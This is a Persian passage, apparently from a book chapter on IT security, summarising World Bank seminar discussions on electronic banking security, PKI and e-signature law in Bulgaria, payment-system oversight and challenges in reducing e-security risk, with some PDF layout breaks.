ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺷﺎﻣﻞ ﻗﺎﻧﻮﻥ ﺳﻨﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺗﻨﻈﻴﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ
ﻗﺎﻧﻮﻧﻲ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﭘﻴـﺸﺮﻓﺘﺔ ﺍﻣـﻀﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎﻧﻜﻬﺎ ﻣﺎﻳﻞ ﺑﻪ ﺍﻳﺠﺎﺩ PKI
ﺹ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ،
ﻫﺴﺘﻨﺪ .ﺑﺎﻧﻜﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺧﺎ ﹺ
ﻧﻘﺶ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻧﻴـﺎﺯ ﺑـﻪ
ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﻱ ﺩﺭﻭﻧﻲ ﻭ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﺎﺯﮔﺎﺭ ﺑـﻴﻦ
ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧﻴـﺰ
ﻳﻚ ﻣﻼﺣﻈﺔ ﺧﺎﺹ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﻋﻼﻭﻩ ﺑﺮ ﺗﻌﺮﻳﻒ ﻧﻴﺎﺯﻫﺎﻱ
ﺗﺠﺎﺭﻱ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﻧﻴﺰ ﺗﻌﺮﻳﻒ ﻛﻨﺪ .ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻭ
ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﻮﻣﻲ ﺍﺯ ﻣﻔﻬﻮﻡ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻓﻌﺎﻟﻴﺘﻬﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﻋﻮﺍﻣﻞ ﻛﻠﻴﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ
ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﻩ ،ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ ،ﻭ ﻗﻴﻤـﺖ.
ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﺩﺭ ﻳﻚ ﻣﻨﻄﻘﺔ ﺣﻔﺎﻇﺖﺷـﺪﻩ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺍﻳـﻦ
ﺣﻔﺎﻇﺖ ﺷـﺎﻣﻞ ﻭﺟـﻮﺩ gatewayﺧـﺎﺹ ﺑـﺮﺍﻱ ﻫـﺮ ﺑﺮﻧﺎﻣـﺔ
ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳـﺖ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑـﺴﺘﺔ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ BANKNETﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﻧﻜﻬﺎ ﺍﺯ ﻃﺮﻳﻖ
ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻋﻠﻴﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣﻴـﺴﺮ
ﺍﺳﺖ .ﺍﻣﺎ ﺩﺭ ﭘﺸﺖ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ،ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﻴﻦ ﺑـﺎﻧﻜﻲ ﺗـﺄﻣﻴﻦ
ﻣﻲﺷﻮﺩ.
ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳـﺎ ﻫـﺮ ﺟـﺎﻱ ﺩﻳﮕـﺮ ،ﺑﺎﻧﻜﻬـﺎﻱ ﻣﺮﻛـﺰﻱ ﺑـﺮﺍﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﺎﺭﭼﻮﺑﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺗـﺼﻮﻳﺐ
ﻻ ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧـﺖ
ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﭼﺎﺭﭼﻮﺑﻬﺎ ﻣﻌﻤﻮ ﹰ
ﻭ ﻗﻮﺍﻧﻴﻦ ﺣﺎﻛﻢ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ ﻫـﺴﺘﻨﺪ .ﺍﺯ ﺍﻳـﻦ
ﻃﺮﻳﻖ ،ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ
ﺍﺯ ﺟﻤﻠﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻣﺮﻛﺰﻱ ﻭ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ
ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ .ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪ ﻛـﻪ ﭘـﻮﻝ ﺭﺍﻳـﺞ
ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺳﺨﺖ ﺗﺮﺍﺯﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﻜﻠﺴﺎﺯ ﺷﺪﻩ ﺍﺳﺖ .ﺁﻧﻬﺎ
٢٢١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺭ ﺧﺼﻮﺹ ﻧﻘﺶ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﭘﺮﺩﺍﺧﺖ ﭘﺮﺳﺶ ﺩﺍﺭﻧﺪ ﻭ ﻣﻲﺧﻮﺍﻫﻨـﺪ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺁﻳـﺎ ﺑﺎﻳـﺪ ﺑـﺮ
ﺳﻴﺴﺘﻤﻬﺎ ﻧﻈﺎﺭﺕ ﺳﺨﺘﮕﻴﺮﺍﻧﻪﺗﺮﻱ ﺍﻋﻤﺎﻝ ﻛـﺮﺩ ﻳـﺎ ﻧـﻪ .ﺑﻌﻨـﻮﺍﻥ
ﻣﺜﺎﻝ ﺑﺮﺯﻳﻞ ﻭ ﺁﻓﺮﻳﻘﺎﻱ ﺟﻨﻮﺑﻲ ﺭﻭﺷﻬﺎﻱ ﺳﺨﺖﮔﻴﺮﺍﻧﻪﺍﻱ ﺑـﺮﺍﻱ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﺘﻘﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﻛﺎﺭﺁ ﻭ ﺭﻗﺎﺑﺘﻲ ﻃﺮﺍﺣـﻲ ﻛـﺮﺩﻩﺍﻧـﺪ .ﺩﺭ ﺑﻌـﻀﻲ ﺷـﺮﺍﻳﻂ،
ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﻋﺎﻣـﻞ ﺍﻧﺤـﺼﺎﺭ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ ﻭ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨـﺪ ،ﻭ
ﻟﺬﺍ ﻣﺴﺘﻨﺪﺍﺕ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺷـﺎﻣﻞ ﺍﺭﺯﻳﺎﺑﻴﻬـﺎﻱ ﺩﻗﻴﻘـﻲ ﺍﺯ ﻧﺤـﻮﺓ
ﺗﺄﺛﻴﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﻧﻴﺰ ﺑﺸﻮﻧﺪ.
ﻧﺘﻴﺠﻪﮔﻴﺮﻱ
ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ :۲۰۰۳
٢٣٥
ﺍﻳﻤﻨﻲ ﻭ ﺳﻼﻣﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺍﻳﻦ ﻧﺸﺴﺖ ﺑﺎ ﻋﻨﺎﻳﺖ ﺑﻪ ﺭﺷـﺪ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻣﺨـﺎﻃﺮﺍﺕ ،ﺍﻫﻤﻴـﺖ
ﺗﻮﺟﻪ ﺑﻪ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺩﺭ ﻗﺎﻟـﺐ ﺟﻬـﺎﻧﻲ
ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ .ﺩﺭﺻﻮﺭﺕ ﺑﻲﻧﻈﻤﻲ ﺩﺭ ﺭﻭﺍﻟﻬﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ،
ﻫﻤﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺧﻄـﺮﺳـﺎﺯﺗﺮ ﺷـﻮﻧﺪ .ﺑﻴـﺸﺘﺮ
ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺩﻗﻴﻖ ﻫﺴﺘﻨﺪ .ﻋـﻼﻭﻩ
ﺑﺮ ﺍﻳﻦ ،ﻛﺮﻣﻬﺎ ،ﻭﻳﺮﻭﺳﻬﺎ ،ﻭ ﺳﺎﻳﺮ ﺍﻧـﻮﺍﻉ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﺮﺍﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﻧﻴﺎ ﻋﻮﺍﺭﺽ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ.
۲۳۵ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀـﻮﺭ ﺍﻋﻀﺎﻱ ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔـﺰﺍﺭ
ﺷــﺪ .ﺍﻋـ ـﻀﺎﻱ ﺣﺎﺿــﺮ ﺩﺭ ﺟﻠــﺴـﻪ ﻋﺒــﺎﺭﺕ ﺑﻮﺩﻧــﺪ ﺍﺯThomas :
،Tom Kellerman ،Glaessnerﻭ ،Valerie McNevin
ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳـﻞ،
ﺷﻴﻠﻲ ،ﻛﻠﻤﺒﻴﺎ ،ﻣﻜﺰﻳﻚ ،ﻋﺮﺑﺴﺘﺎﻥ ﺳﻌﻮﺩﻱ ،ﺍﻭﻛـﺮﺍﻳﻦ ،ﺍﺳـﺘﺮﺍﻟﻴﺎ ،ﭼـﻴﻦ
)ﭘﻜﻦ( ،ﭼﻴﻦ )ﻫﻨﮓﻛﻨـﮓ( ،ﻣـﺎﻟﺰﻱ ،ﻓﻴﻠﻴﭙـﻴﻦ ،ﺳـﻨﮕﺎﭘﻮﺭ ،ﻭ ﺳـﺮﻳﻼﻧﻜﺎ.
ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺻﻠﻲ ﺍﻳﻦ ﻧﺸﺴﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺩﺭﺱ ﺯﻳـﺮ
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://wbln0018.worldbank.org/html/FinancialS
ectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Presentations
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ:
ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﻧﺮﻡ ﻭ ﺳﺨﺖ
ﻳﻚ ﺗﻌﺮﻳﻒ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ
ﻲ ﻳﻚ ﺳﻴﺴﺘﻢ
"ﻫﺮ ﺍﺑﺰﺍﺭ ،ﻓﻦ ،ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺩﺍﺭﺍﻳﻴﻬﺎﻱ ﺍﻃﻼﻋﺎﺗ ﹺ
ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣـﺎﻧﮕﻲ ،ﺟﺎﻣﻌﻴـﺖ ﻳـﺎ ﺩﺭ
ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﺍﺳﺖ ،ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ" .ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ
ﺩﻭ ﺯﻳﺮﺳﺎﺧﺖ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ :ﺯﻳﺮﺑﻨﺎﻱ ﻧﺮﻡ ﺷﺎﻣﻞ ﺳﻴﺎﺳﺘﻬﺎ،
ﺭﻭﺍﻟﻬــﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬــﺎ؛ ﻭ ﺯﻳﺮﺑﻨــﺎﻱ ﺳــﺨﺖ ﺷــﺎﻣﻞ
ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ .ﺍﻓﺰﺍﻳﺶ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ
ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﺗﻬﺪﻳـﺪﻫـﺎ ﻭ ﺍﺣﻴﺎﻧـﹰﺎ ﮔـﺴﺘﺮﺩﻩﺗـﺮ ﺷـﺪﻥ
ﺗﺄﺛﻴﺮﺍﺕ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ
ﭘﻴﺶ ﺍﺯ ﺍﻳﻦ ﺩﻳﺪﻳﻢ ﺑﻪ ﻋﻠﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻭ ﮔـﺎﻩ
ﺗﺮﻭﺭﻳﺴﺘﻲ ،ﺑﺮ ﺳﺮﻋﺖ ﻭ ﺷﺪﺕ ﺣﻤﻼﺕ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷـﻮﺩ .ﻫﻤـﺔ
ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺳﺖ ﺑﻪ ﺩﺳﺖ ﻫﻢ ﻣﻲﺩﻫﻨﺪ ﺗﺎ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ
ﺑﻪ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﺍﻳـﺪﻩﺁﻝ ﻭ
ﺍﺛﺮﺑﺨﺶ ﺗﺒﺪﻳﻞ ﻛﻨﻨﺪ.
ﮔﺴﺘﺮﺵ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﺑـﺎ
ﭼﺎﻟﺸﻬﺎﻱ ﻋﻈﻴﻤﻲ ﺭﻭﺑﺮﻭ ﺍﺳﺖ:
ﻻ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺠـﺎﻱ
ﺍﻭﻝ ،ﻣﻌﻤﻮ ﹰ
ﻛﻨﺸﻲ ﺑﻮﺩﻥ ،ﻭﺍﻛﻨﺸﻲ ﺑﺎﺷﻨﺪ .ﺑﺎﻳﺪ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﺍﺩ ﺗـﺎ
ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻌﺎﻻﻧﻪ ﻭ ﻣﺪﺍﻭﻡ ﺑﺎ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﻳﻨـﺪﻩ ﺑـﻪ
ﻣﺒﺎﺭﺯﻩ ﭘﺮﺩﺍﺧﺖ.
ﺩﻭﻡ ،ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺯ ﺍﻫﻤﻴـﺖ ﻭﻳـﮋﻩﺍﻱ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﺑﺨﺼﻮﺹ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻧـﺎﻇﺮﺍﻥ؛
ﺍﻣﺎ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﻛﺸﻮﺭ ﻭﺍﺣﺪ ﻫﻢ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺍﺧﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﺮﻱ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎﻱ ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺑﺮ ﺿﺮﻭﺭﺕ ﺁﻣﻮﺯﺷﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ
ﻭ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺯﻣﻴﻨﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ ،ﻭ ﻧﻬﺎﻳﺘـﹰﺎ
ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺭﺍﺋـﻪ ﮔﺰﺍﺭﺷـﺎﺕ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻭ ﺑﺮﮔﺰﺍﺭﻱ ﺳـﻤﻴﻨﺎﺭﻫﺎ ﺩﺭ ﻣﻮﺿـﻮﻉ ﻛـﺎﻫﺶ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﺮﻓﺖ.
ﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﻤﺒﻮﺩ ﺗﻴﻤﻬﺎﻱ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ
ﺍﻣﻨﻴﺘﻲ ﺗﻌﻠﻴﻢﺩﻳـﺪﻩ ،ﻓﻘـﺪﺍﻥ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻛـﺎﺭﺁﻱ ﺩﻭﻟﺘـﻲ ﺑـﺮﺍﻱ
ﻛﻨﺘﺮﻝ ﺻﺤﺖ ،ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳـﻴﺎﺭ.
ﺳﺘﻮﻧﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑـﻪ
ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻫﻢ ﺑـﻪ ﻫﻤـﺎﻥ
ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻣﻲﺑﺎﺷﻨﺪ ،ﻣﻴﻠﻴﺎﺭﺩﻫـﺎ ﺩﻻﺭ ﺳـﺮﻣﺎﻳﻪ ﺩﺭ
ﻣﻌﺮﺽ ﺧﻄﺮ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﻫﺪﻑ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘـﺮﺩﺍﺧﺘﻦ
ﺑﻪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺥ ﻣﻲﺩﻫﻨـﺪ ،ﺑﻠﻜـﻪ ﺁﻥ
ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ ﭼﻪ ﻛﺎﺭﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺠﺎﻡ ﺩﺍﺩ.
٢٢٢
ﺳﻮﻡ ،ﻋﺪﻡ ﮔـﺰﺍﺭﺵ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻳـﻚ ﻣـﺎﻧﻊ ﺟـﺪﻱ ﺑـﺮﺍﻱ ﺩﺭﻙ
ﻣﺤﺪﻭﺩﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻫﻨﻮﺯ ﺑﻲ ﻣﻴﻠـﻲ ﻗﺎﺑـﻞ
ﺗﻮﺟﻬﻲ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻋﻤﻮﻣﻲ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﭼﻬﺎﺭﻡ ،ﻋﻼﻭﻩ ﺑﺮ ﺑـﻲﻋﻼﻗﮕـﻲ ﻣﺆﺳـﺴﺎﺕ ﺑـﻪ ﮔـﺰﺍﺭﺵﻛـﺮﺩﻥ
ﺭﺧﺪﺍﺩﻫﺎ ،ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻧﻴـﺰ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩ ﺍﺳﺖ.
ﺳﺮﺍﻧﺠﺎﻡ ﺁﻧﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻧﻘﺶ ﻣﺤﻮﺭﻱ ﺑﺎﺯﻱ ﻣﻲﻛﻨﻨـﺪ
ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷـﺒﻜﻪ ﺭﺍ ﺯﻳـﺮ
ﺳﺆﺍﻝ ﺑﺒﺮﺩ؛ ﻭ ﻟﺬﺍ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺁﮔﺎﻫﻲ ﺗﻤﺎﻡ ﺍﻓـﺮﺍﺩ ﻧـﺴﺒﺖ
ﺑﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ
